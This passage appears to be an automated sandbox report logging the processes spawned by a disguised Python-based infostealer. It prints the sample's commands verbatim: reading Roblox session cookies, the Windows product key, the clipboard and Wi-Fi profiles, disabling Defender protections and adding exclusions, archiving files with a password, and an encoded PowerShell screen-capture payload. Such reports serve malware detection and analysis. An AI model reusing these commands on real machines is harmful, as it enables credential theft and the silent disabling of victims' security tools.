JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6756.tmp" "c:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: python3.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: libffi-8.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: sqlite3.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: libcrypto-3.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: libssl-3.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: dciman32.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: mmdevapi.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: ksuser.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: avrt.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: audioses.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: midimap.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
